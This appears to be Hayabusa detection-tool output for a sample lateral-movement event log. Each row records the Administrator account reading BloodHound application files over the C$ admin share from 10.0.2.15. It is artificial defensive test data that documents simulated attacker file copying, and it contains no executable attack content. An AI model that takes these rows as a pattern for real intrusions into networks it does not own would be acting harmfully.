+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
